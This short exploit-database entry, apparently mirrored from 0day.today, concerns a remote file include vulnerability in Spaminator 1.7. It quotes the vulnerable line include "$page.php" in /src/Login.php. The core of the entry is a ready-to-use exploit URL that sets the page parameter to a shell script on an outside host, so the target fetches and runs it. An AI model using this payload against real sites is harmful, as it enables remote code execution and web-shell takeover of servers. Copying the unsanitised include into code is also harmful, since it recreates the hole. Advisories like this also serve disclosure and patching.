id: 676
date: 08/09/2006
title: Spaminator <= 1.7 (page) Remote File Include Vulnerability
author: Drago84
cves: 

==========================================================
Spaminator <= 1.7 (page) Remote File Include Vulnerability
==========================================================



Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC

BuG Found By Drago84

Page Affect is:
/src/Login.php

Problem is
   include "$page.php";

Path :
Declare $page

ExpL:
http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?




#  0day.today [2023-03-27]  #